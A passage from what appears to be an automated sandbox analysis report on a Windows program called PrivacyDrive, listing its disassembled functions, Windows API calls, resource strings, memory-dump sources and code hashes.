                                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000002), ref: 00403653
                                • GetLastError.KERNEL32(?,00000001,00000001,?,?,7563D392), ref: 00403674
                                • FormatMessageW.KERNEL32(00001300,00000000,00000000,00000000,?,00000000,00000000,?,00000001,00000001,?,?,7563D392), ref: 00403693
                                • LocalFree.KERNEL32(00000000,00000001,?,?,7563D392), ref: 004036BE
                                  • Part of subcall function 004A6480: SetLastError.KERNEL32(00000000), ref: 004A666F
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000004.00000002.2150978302.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151132618.0000000000552000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151182878.00000000005AC000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151210226.00000000005AD000.00000008.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005BA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005C0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005C1000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005CB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.0000000000601000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_PrivacyDrive.jbxd
                                Similarity
                                • API ID: Message$Peek$ErrorLast$CloseControlCreateDeviceFileFormatFreeHandleLocalwsprintf
                                • String ID: !@$%c:$0016$0022$0029
                                • API String ID: 2704691174-1726813969
                                • Opcode ID: 5f24f6ef5e7d46d9e4a494608de4282668a4d28811a082688af7ac02d9fbadf6
                                • Instruction ID: 31412f3bf7a1ac3e694d361a8f39e4ee48b85b686707f11fe369b3550fe6f3a5
                                • Opcode Fuzzy Hash: 5f24f6ef5e7d46d9e4a494608de4282668a4d28811a082688af7ac02d9fbadf6
                                • Instruction Fuzzy Hash: 6181D670E00308AAEB10DFA4CC46BEEBEB8BF05719F14412AF504B73D1D7B95A048B69
                                Function 00436220 Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 148COMMON
                                Download Yara Rule
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000004.00000002.2150978302.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151132618.0000000000552000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151182878.00000000005AC000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151210226.00000000005AD000.00000008.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005BA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005C0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005C1000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005CB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.0000000000601000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_PrivacyDrive.jbxd
                                Similarity
                                • API ID: _memset$_memmove
                                • String ID: 8GW$PublicKey$SerialNumber.cpp$Version2.xml$_1K
                                • API String ID: 2532777613-2887264915
                                • Opcode ID: de0c5c0a06387669f1bb31e05598b7a9625e796630f1576bdac0d428fb526df5
                                • Instruction ID: ca0cafd54b3c3db3e4d1dbc2cdb5afc0daf6f304b2cc11b1bffecd5b0a2cdfbe
                                • Opcode Fuzzy Hash: de0c5c0a06387669f1bb31e05598b7a9625e796630f1576bdac0d428fb526df5
                                • Instruction Fuzzy Hash: C74172B590021AABDB10EF90DC86FEFBBBCFB49714F144129F90477281E7755A048AA5
                                Function 004147B0 Relevance: 21.1, APIs: 6, Strings: 8, Instructions: 103COMMON
                                Download Yara Rule
                                APIs
                                • EnterCriticalSection.KERNEL32(005BDCE4), ref: 004147C0
                                • LeaveCriticalSection.KERNEL32(005BDCE4), ref: 004147D8
                                • EnterCriticalSection.KERNEL32(005BDCE4,00000000,Dialog,?,PASSWORD), ref: 00414805
                                • LeaveCriticalSection.KERNEL32(005BDCE4), ref: 00414817
                                  • Part of subcall function 004C24A0: WideCharToMultiByte.KERNEL32(00000003,00000000,?,000000FF,?, v,00000000,00000000,00000000,?,00000000,?,00000003,?,00583B28,00000000), ref: 004C2699
                                • EnterCriticalSection.KERNEL32(005BDCE4,00000000,Dialog,?,PASSWORD), ref: 00414844
                                • LeaveCriticalSection.KERNEL32(005BDCE4), ref: 00414856
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000004.00000002.2150978302.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151132618.0000000000552000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151182878.00000000005AC000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151210226.00000000005AD000.00000008.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005BA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005C0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005C1000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005CB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.0000000000601000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_PrivacyDrive.jbxd
                                Similarity
                                • API ID: CriticalSection$EnterLeave$ByteCharMultiWide
                                • String ID: Dialog$PASSWORD$PM_CHECK_SHOW_PASSWORD_X$PM_CHECK_SHOW_PASSWORD_Y$PM_EDIT_PASSWORD_X$PM_EDIT_PASSWORD_Y$PM_ICON_X$PM_ICON_Y
                                • API String ID: 904232820-2624524072
                                • Opcode ID: e8db55d7b1908a0fa7b2e1c0d2b0fa62b8fba69d15af4ddc4ae9a52a096395ea
                                • Instruction ID: 0749ce777d0c1f011bc5d9ffd6b66f9ba536939ed2dc269ecbaf3dadcd922a93
                                • Opcode Fuzzy Hash: e8db55d7b1908a0fa7b2e1c0d2b0fa62b8fba69d15af4ddc4ae9a52a096395ea
                                • Instruction Fuzzy Hash: E231867039070666DA54BB728D22FB75A9D7B44F06F04412BB644D72C1EFE8E811C7E8
                                Function 00428490 Relevance: 21.1, APIs: 6, Strings: 8, Instructions: 98COMMON
                                Download Yara Rule
                                APIs
                                • EnterCriticalSection.KERNEL32(005BDCE4,?,?,?,004285EC,?,?,?,004260BD,?,00000000,?,?), ref: 004284A0
                                • LeaveCriticalSection.KERNEL32(005BDCE4,?,?,004260BD,?,00000000,?,?), ref: 004284B8
                                • EnterCriticalSection.KERNEL32(005BDCE4,00000000,Button,?,ATTRIB_INFO_EXPAND,?,?,004260BD,?,00000000,?,?), ref: 004284E5
                                • LeaveCriticalSection.KERNEL32(005BDCE4,?,?,004260BD,?,00000000,?,?), ref: 004284F7
                                  • Part of subcall function 004C24A0: WideCharToMultiByte.KERNEL32(00000003,00000000,?,000000FF,?, v,00000000,00000000,00000000,?,00000000,?,00000003,?,00583B28,00000000), ref: 004C2699
                                • EnterCriticalSection.KERNEL32(005BDCE4,00000000,Button,?,ATTRIB_INFO_EXPAND,?,?,004260BD,?,00000000,?,?), ref: 00428524
                                • LeaveCriticalSection.KERNEL32(005BDCE4,?,?,004260BD,?,00000000,?,?), ref: 00428536
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000004.00000002.2150978302.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151132618.0000000000552000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151182878.00000000005AC000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151210226.00000000005AD000.00000008.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005BA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005C0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005C1000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005CB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.0000000000601000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_PrivacyDrive.jbxd
                                Similarity
                                • API ID: CriticalSection$EnterLeave$ByteCharMultiWide
                                • String ID: ATTRIB_INFO_EXPAND$Button$IMG_HIT_DOWN$IMG_HIT_UP$IMG_NORMAL_DOWN$IMG_NORMAL_UP$IMG_PUSH_DOWN$IMG_PUSH_UP
                                • API String ID: 904232820-555796725
                                • Opcode ID: 11c9a47e5b92698b2e0b2151c23fcaf5e2db74ea38875ed784e1f084f3d97d25
                                • Instruction ID: b6b36f9a8226f80d28ac43113e655ba857088e9019b2d533f81fd12321fe5249
                                • Opcode Fuzzy Hash: 11c9a47e5b92698b2e0b2151c23fcaf5e2db74ea38875ed784e1f084f3d97d25
                                • Instruction Fuzzy Hash: 4A31A5703C031677D62467729C42FAB6A987F50B55F08002FBB4AD62C1FED8F940D668
                                Function 00439130 Relevance: 19.7, APIs: 13, Instructions: 191COMMON
                                Download Yara Rule
                                APIs
                                • GdipGraphicsClear.GDIPLUS(?,00000000,7563D392), ref: 004A1098
                                • GdipSetSmoothingMode.GDIPLUS(?,00000002), ref: 004A10B0
                                • GdipCreateRegion.GDIPLUS(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0053E8F0,000000FF), ref: 004A10CA
                                • GdipGetClip.GDIPLUS(?,00000000), ref: 004A10EE
                                • GdipCreatePath.GDIPLUS(00000000,00000000), ref: 004A1133
                                • GdipSetClipPath.GDIPLUS(?,?,00000004), ref: 004A1172
                                • GdipSetClipRegion.GDIPLUS(?,00000000,00000000), ref: 004A11B3
                                • GdipSetSmoothingMode.GDIPLUS(?,00000003), ref: 004A11D5
                                • GdipTranslateWorldTransform.GDIPLUS(?), ref: 004A1213
                                • GdipTranslateWorldTransform.GDIPLUS(?), ref: 004A1266
                                • GdipSetClipRegion.GDIPLUS(?,00000000,00000000), ref: 004A127B
                                • GdipDeletePath.GDIPLUS(?), ref: 004A1291
                                • GdipDeleteRegion.GDIPLUS(00000000), ref: 004A12A0
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000004.00000002.2150978302.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151132618.0000000000552000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151182878.00000000005AC000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151210226.00000000005AD000.00000008.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005BA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005C0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005C1000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005CB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.0000000000601000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_PrivacyDrive.jbxd
                                Similarity
                                • API ID: Gdip$ClipRegion$Path$CreateDeleteModeSmoothingTransformTranslateWorld$ClearGraphics
                                • String ID:
                                • API String ID: 3845705052-0
                                • Opcode ID: abb4dbc3257b5589be9d3270ae3f52eebd5188cd6de3b443a52635d01536f3fd
                                • Instruction ID: c7dce2d391305d759e396d9df7e64aeae884a3180a2cf56a44ec79880b824830
                                • Opcode Fuzzy Hash: abb4dbc3257b5589be9d3270ae3f52eebd5188cd6de3b443a52635d01536f3fd
                                • Instruction Fuzzy Hash: EF7179756083419FD715CF28C954B2ABBE4FF9A704F004A2EF985A73A0EB31E844DB56
                                Function 00486BD0 Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 167COMMON
                                Download Yara Rule
                                APIs
                                • GdipCreatePen1.GDIPLUS(00000000,00000000,00547488,7563D392,?,00000000), ref: 00486C1A
                                • GdipCreatePen1.GDIPLUS(?,00000000,?,?,00000000), ref: 00486C41
                                • GdipCreateTexture.GDIPLUS(?,00000000,7563D392,?,00000000,?,?,00000000), ref: 00486CC4
                                • GdipCreateSolidFill.GDIPLUS(?,00000000,?,00000000,?,?,00000000), ref: 00486D07
                                • GdipCreateSolidFill.GDIPLUS(00000000,?,00000000,?,?,00000000), ref: 00486D40
                                • GdipDeleteBrush.GDIPLUS(?,?,00000000,?,?,00000000), ref: 00486DCD
                                • GdipDeleteBrush.GDIPLUS(?,?,00000000,?,?,00000000), ref: 00486DDD
                                • GdipDeleteBrush.GDIPLUS(?,?,00000000,?,?,00000000), ref: 00486DED
                                • GdipDeletePen.GDIPLUS(00000000,?,00000000,?,?,00000000), ref: 00486DFC
                                • GdipDeletePen.GDIPLUS(00000000,?,00000000,?,?,00000000), ref: 00486E08
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000004.00000002.2150978302.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151132618.0000000000552000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151182878.00000000005AC000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151210226.00000000005AD000.00000008.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005BA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005C0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005C1000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005CB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.0000000000601000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_PrivacyDrive.jbxd
                                Similarity
                                • API ID: Gdip$CreateDelete$Brush$FillPen1Solid$Texture
                                • String ID: xV
                                • API String ID: 2474244928-2633863268
                                • Opcode ID: 047988f8942f76ddbfbb3d2d1e8950f912460d6b598600ca6d5d313effff36bf
                                • Instruction ID: 68ff80ec52db82f4f60f78c9aa8385c9c747ba73df99d2832d46df66837cbbae
                                • Opcode Fuzzy Hash: 047988f8942f76ddbfbb3d2d1e8950f912460d6b598600ca6d5d313effff36bf
                                • Instruction Fuzzy Hash: C4713674D04209EFDB44DFA8C844BEEBBF9BB08304F14455AE414A7290EBB5A904CFA5
                                Function 0041D680 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 87serviceCOMMON
                                Download Yara Rule
                                APIs
                                • OpenSCManagerW.ADVAPI32(00000000,00000000,000F003F,00000000,75A90460,75A90500), ref: 0041D6A4
                                • OpenServiceW.ADVAPI32(00000000,PDService,000F01FF), ref: 0041D6BB
                                • QueryServiceStatus.ADVAPI32(00000000,?), ref: 0041D6D0
                                • CloseServiceHandle.ADVAPI32(00000000), ref: 0041D6E2
                                • CloseServiceHandle.ADVAPI32(00000000), ref: 0041D6E5
                                • OpenSCManagerW.ADVAPI32(00000000,00000000,000F003F), ref: 0041D709
                                • OpenServiceW.ADVAPI32(00000000,?,000F01FF), ref: 0041D71D
                                • DeleteService.ADVAPI32(00000000), ref: 0041D72A
                                • CloseServiceHandle.ADVAPI32(00000000), ref: 0041D731
                                • CloseServiceHandle.ADVAPI32(?), ref: 0041D736
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000004.00000002.2150978302.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151132618.0000000000552000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151182878.00000000005AC000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151210226.00000000005AD000.00000008.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005BA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005C0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005C1000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005CB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.0000000000601000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_PrivacyDrive.jbxd
                                Similarity
                                • API ID: Service$CloseHandleOpen$Manager$DeleteQueryStatus
                                • String ID: PDService
                                • API String ID: 4103454408-2327897599
                                • Opcode ID: e6b9b435bace0a7c1673e8052b944193f32d90310cf8a15623c92c02d35d1b29
                                • Instruction ID: 6ae079ad34af34cc977756f326ba9ec26ebb204f395a28e9fb669ed39518a929
                                • Opcode Fuzzy Hash: e6b9b435bace0a7c1673e8052b944193f32d90310cf8a15623c92c02d35d1b29
                                • Instruction Fuzzy Hash: 6E21C431B02318ABCB15AF659C99AFF77A8FF99311F00002EE905A7290DA789C04D7A4
                                Function 0042E510 Relevance: 18.3, APIs: 12, Instructions: 263COMMON
                                Download Yara Rule
                                APIs
                                • GetDC.USER32(00000000), ref: 0042E55A
                                • GdipCreateFromHDC.GDIPLUS(00000000,?), ref: 0042E57A
                                • GdipCreateStringFormat.GDIPLUS(00000000,00000000), ref: 0042E5FD
                                • GdipMeasureString.GDIPLUS(00000000,?,000000FF,00000000,00000000,00000000,00000000,?,?), ref: 0042E63E
                                • SystemParametersInfoW.USER32(00000030,00000000,0053DFC0,00000000), ref: 0042E68F
                                • GdipSetTextRenderingHint.GDIPLUS(00000000,00000005), ref: 0042E6BC
                                • GdipSetStringFormatTrimming.GDIPLUS(00000000,00000002), ref: 0042E6CF
                                • GdipMeasureString.GDIPLUS(00000000,?,000000FF,00000000,00000000,00000000,00000000,?,?), ref: 0042E71B
                                • GdipMeasureString.GDIPLUS(00000000,?,000000FF,00000000,00000000,00000000,00000000,?,?), ref: 0042E7C3
                                • ReleaseDC.USER32(00000000,?), ref: 0042E846
                                • GdipDeleteStringFormat.GDIPLUS(00000000), ref: 0042E853
                                • GdipDeleteGraphics.GDIPLUS(00000000), ref: 0042E861
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000004.00000002.2150978302.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151132618.0000000000552000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151182878.00000000005AC000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151210226.00000000005AD000.00000008.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005BA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005C0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005C1000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005CB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.0000000000601000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_PrivacyDrive.jbxd
                                Similarity
                                • API ID: Gdip$String$FormatMeasure$CreateDelete$FromGraphicsHintInfoParametersReleaseRenderingSystemTextTrimming
                                • String ID:
                                • API String ID: 3909781840-0
                                • Opcode ID: 0b8b016dcd3aa8d5325656bcd8e34c06c7f9fee584fceeed740c6258915acdf6
                                • Instruction ID: ec4d796a4ae45c7bb6f91e9307edf151e4d2becafce912e3743b59b4ef1b6657
                                • Opcode Fuzzy Hash: 0b8b016dcd3aa8d5325656bcd8e34c06c7f9fee584fceeed740c6258915acdf6
                                • Instruction Fuzzy Hash: B1B13771D103189FDB11CFAAD894BAEBBB4BF59304F14831AE815B72A0EB746985DF10
                                Function 004309B0 Relevance: 18.2, APIs: 12, Instructions: 222windowtimethreadCOMMON
                                Download Yara Rule
                                APIs
                                • GetMessageW.USER32(00000000,00000000,00000000,00000000), ref: 004309FB
                                • EnterCriticalSection.KERNEL32(?), ref: 00430A74
                                • LeaveCriticalSection.KERNEL32(?), ref: 00430ACC
                                • KillTimer.USER32(00000000), ref: 00430AEB
                                • IsWindowVisible.USER32(00000000), ref: 00430B73
                                • KillTimer.USER32(00000000), ref: 00430B8A
                                  • Part of subcall function 00430E20: __CxxThrowException@8.LIBCMT ref: 00430E94
                                  • Part of subcall function 00430E20: SetWindowPos.USER32(00000000,?,00577AF8), ref: 00430F0A
                                • PostThreadMessageW.USER32(?,00000466,00000000,00000000), ref: 00430BAB
                                • KillTimer.USER32(00000000), ref: 00430BCA
                                • SetTimer.USER32(00000000), ref: 00430BE4
                                • TranslateMessage.USER32(?), ref: 00430C7C
                                • DispatchMessageW.USER32(?), ref: 00430C87
                                • PostQuitMessage.USER32(00000000), ref: 00430CE7
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000004.00000002.2150978302.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151132618.0000000000552000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151182878.00000000005AC000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151210226.00000000005AD000.00000008.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005BA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005C0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005C1000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005CB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.0000000000601000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_PrivacyDrive.jbxd
                                Similarity
                                • API ID: Message$Timer$Kill$CriticalPostSectionWindow$DispatchEnterException@8LeaveQuitThreadThrowTranslateVisible
                                • String ID:
                                • API String ID: 2598821415-0
                                • Opcode ID: 4309f8ab2c1bb3d28e075a19b2608bbd0cffe8fc278e372026d0db3b521c37bb
                                • Instruction ID: 9bfdfca8665926ec23bfe1de31d745c4be989e6bb87f0e050d1725fd5901b16d
                                • Opcode Fuzzy Hash: 4309f8ab2c1bb3d28e075a19b2608bbd0cffe8fc278e372026d0db3b521c37bb
                                • Instruction Fuzzy Hash: F6915770608341DFD720DF64C868B9BBBE8BF89715F101A1EF59A87290DB78E804CB56
                                Function 00418570 Relevance: 18.2, APIs: 12, Instructions: 214windowsleepCOMMON
                                Download Yara Rule
                                APIs
                                • GetWindowRect.USER32(00000000), ref: 004185B4
                                  • Part of subcall function 004CB410: GdipSetSmoothingMode.GDIPLUS(?,00000003,?,lB,0056CE40,?,?,?,?,0042E96C,?,?), ref: 004CB477
                                • __CxxThrowException@8.LIBCMT ref: 00418608
                                  • Part of subcall function 00502BEB: RaiseException.KERNEL32(?,?,7563D392,005A7F20,?,?,?,?,?,004FFD4E,7563D392,005A7F20,?,00000001), ref: 00502C40
                                • QueryPerformanceFrequency.KERNEL32(?,?,?), ref: 0041861B
                                • QueryPerformanceCounter.KERNEL32(?), ref: 00418649
                                • QueryPerformanceCounter.KERNEL32(?), ref: 0041864F
                                • PeekMessageW.USER32(00000002,00000000,00000000,00000000,00000002), ref: 004186A6
                                • GetDC.USER32(00000000), ref: 00418738
                                • UpdateLayeredWindow.USER32(?,00000000,?,?,?,00000000,00000000,00000000,00000002), ref: 00418761
                                • ReleaseDC.USER32(00000000,00000000), ref: 0041876A
                                • Sleep.KERNEL32(0000000A), ref: 00418772
                                • QueryPerformanceCounter.KERNEL32(?), ref: 0041877C
                                • PeekMessageW.USER32(00000002,00000000,00000000,00000000,00000002), ref: 004187C5
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000004.00000002.2150978302.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151132618.0000000000552000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151182878.00000000005AC000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151210226.00000000005AD000.00000008.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005BA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005C0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005C1000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005CB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.0000000000601000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_PrivacyDrive.jbxd
                                Similarity
                                • API ID: PerformanceQuery$Counter$MessagePeekWindow$ExceptionException@8FrequencyGdipLayeredModeRaiseRectReleaseSleepSmoothingThrowUpdate
                                • String ID:
                                • API String ID: 1948315272-0
                                • Opcode ID: 1306a8954b857425f68729ebc9de93de622753df58c09ae304f5336cb33c49d6
                                • Instruction ID: 95268be089aaa629ead29e8009c24e375342d2e9e287a7d4d7c7dff199bfb841
                                • Opcode Fuzzy Hash: 1306a8954b857425f68729ebc9de93de622753df58c09ae304f5336cb33c49d6
                                • Instruction Fuzzy Hash: 8D911375900219AFDB11DFA4DC99BDEBBB8BF08300F10421AE915B72A1DB74A988CF50
                                Function 004A0330 Relevance: 18.2, APIs: 12, Instructions: 210windowCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 004D44A0: VirtualAlloc.KERNEL32(00000000,00000014,00001000,00000040,?,004A0394,7563D392), ref: 004D44B4
                                  • Part of subcall function 004D44A0: GetCurrentProcess.KERNEL32(?,00000014), ref: 004D4512
                                  • Part of subcall function 004D44A0: FlushInstructionCache.KERNEL32(00000000), ref: 004D4519
                                  • Part of subcall function 0049FFD0: EnterCriticalSection.KERNEL32(005BDCE4,?,?,?,004A03AE), ref: 0049FFE0
                                  • Part of subcall function 0049FFD0: LeaveCriticalSection.KERNEL32(005BDCE4,?,?,?,004A03AE), ref: 0049FFF8
                                  • Part of subcall function 0049FFD0: EnterCriticalSection.KERNEL32(005BDCE4,00000000,Dialog,?,BASE_DIALOG,?,?,?,004A03AE), ref: 004A0025
                                  • Part of subcall function 0049FFD0: LeaveCriticalSection.KERNEL32(005BDCE4,?,?,?,004A03AE), ref: 004A0037
                                  • Part of subcall function 0049FFD0: EnterCriticalSection.KERNEL32(005BDCE4,00000000,Dialog,?,BASE_DIALOG,?,?,?,004A03AE), ref: 004A0064
                                  • Part of subcall function 0049FFD0: LeaveCriticalSection.KERNEL32(005BDCE4,?,?,?,004A03AE), ref: 004A0076
                                • GetDesktopWindow.USER32 ref: 004A0440
                                • IsWindowEnabled.USER32(?), ref: 004A044B
                                • SendMessageW.USER32(?,0000000A,00000000,00000000), ref: 004A045C
                                • EnableWindow.USER32(?,00000000), ref: 004A0465
